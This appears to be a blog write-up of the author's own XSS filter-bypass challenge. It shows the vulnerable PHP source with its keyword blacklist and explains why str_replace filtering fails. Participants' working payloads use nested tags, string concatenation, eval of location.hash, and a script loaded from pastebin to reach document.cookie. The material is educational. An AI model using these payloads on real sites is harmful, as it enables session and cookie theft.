Hello
As you know, XSS Bypass Challenges usually depends on knowledge of JavaScript, a good analysis on behavior of the web application and creativity. As in all my other challenges, that one was simulation of real life example that i experienced during penetration test, as well. We will have a look source code to understand what developer tried to fix XSS vulnerability and what he/she missed.
If you didn’t tried to bypass the Challenge yet. Please try yourself with it which you can reach directly via http://lab.mehmetince.net/h4ckm3/xss-2/index.php then you can come back here and continue to read rest part of the post.
First Thing First
I want to share names and their payloads who successfully bypassed Challenge.
@0x90kh4n
http://lab.mehmetince.net/h4ckm3/xss-2/index.php?ali=%3C/scscriptript%3E%3Cscscriptript%20src=http://pastebin.com/raw.php?i=JVzVmtGJ%3E%3C/scriscriptpt%3E
@y_arabaci
http://lab.mehmetince.net/h4ckm3/xss-1/index.php?ali=%27%3B+v1%3D%27al%27%3B+v2%3D%27ert%27%3B+window%5Bv1%2Bv2%5D%28document.cookie%29%3B%27
@prakharprased
http://lab.mehmetince.net/h4ckm3/xss-2/index.php?ali=%3C/scscriptript%3E%3Cinput%20onfocus=eval%28location.hash.slice%281%29%29;%20autofocus%3E#alert%28document.cookie%29
@ysr08
http://lab.mehmetince.net/h4ckm3/xss-2/index.php?ali=%3C/scscriptript%3E%3Cscscriptript%3Ealalertert(document.cookie)%3C/scriscriptpt%3E
@SammyKalintosh
http://lab.mehmetince.net/h4ckm3/xss-1/index.php?ali=Sammy+Kalintosh+was+here....+%40sammykalintosh
Source Code
<html xmlns="http://www.w3.org/1999/html" lang="UTF-8">
<head>
<META http-equiv=content-type content=text/html;charset=iso-8859-9>
<script src="http://code.jquery.com/jquery-1.11.0.min.js"></script>
<script>
$( document ).ready(function() {
var LoadString = function(str){
$('#content').text(str);
}
<?php
setcookie('freedom_for', 'twitter!!!TURKIYE!');
if(@$_REQUEST['ali']){
$foo = addslashes($_REQUEST['ali']);
$zararli = array('alert', 'confirm', 'write', 'img', 'svg', 'prompt','script');
$foo = str_replace($zararli, '', strtolower($foo));
echo "LoadString('".$foo."')";
}
?>
});
</script>
</head>
<div style="text-align: center;">
<h3>XSS - 2</h3>
<h4>Target : alert document.cookie</h4>
<h4>Please mention your solutions to @mmetince </h4>
<div id="content">w8 input</div>
<body>
<form action="index.php" method="GET">
<input type="text" name="ali" placeholder="XSS payload.">
<input type="submit" value="Gonder"></input>
</form>
</body>
</div>
</html>
As you can see, there is something wrong with PHP part of the source code. First thing that I want to mention about addslashes() . This function convert each single quote to backslash + single quote which is beginning part of prevent inline-javascript XSS vulnerability.
Hello' #Convert to Hello\'
Secondarily, the point that I want to emphasise will be about black listing specific HTML tags. If you -really- want to detect HTML tag from inside of the user user inputs, you have to be careful. In this example, most common html tags removed from user input via str_replace . In order to bypass that security concept of PHP codes, we will focus on usage of str_replace. Please read following codes to understand payload.
#Input - 1 <script>alert(1)</script> #Output - 1 <>alert(1)</> #Input - 2 <scrSCRIPTipt>alert(1)</scrSCRIPTipt> #Output - 2 <script>alert(1)</script>
Results
To be honest, i like @0x90kh4n and @prakharprased solutions. Actually i used exactly the same payload with 0x90kh4n.
http://lab.mehmetince.net/h4ckm3/xss-2/index.php?ali=</scscriptript><scscriptript src=http://pastebin.com/raw.php?i=JVzVmtGJ></scriscriptpt>
As you figure out, first step ile ending javascript tag with </scscriptript> and reopen it via <scscriptript>. After that call your remote JS file which it contains alert(document.cookie) method. And close your javascript tag with </scriscriptpt>. That’s all
In conclusion, I will prepare and post online new challenges which i experienced on during penetration test, again! Besides, next challenge will be about SQL Injection.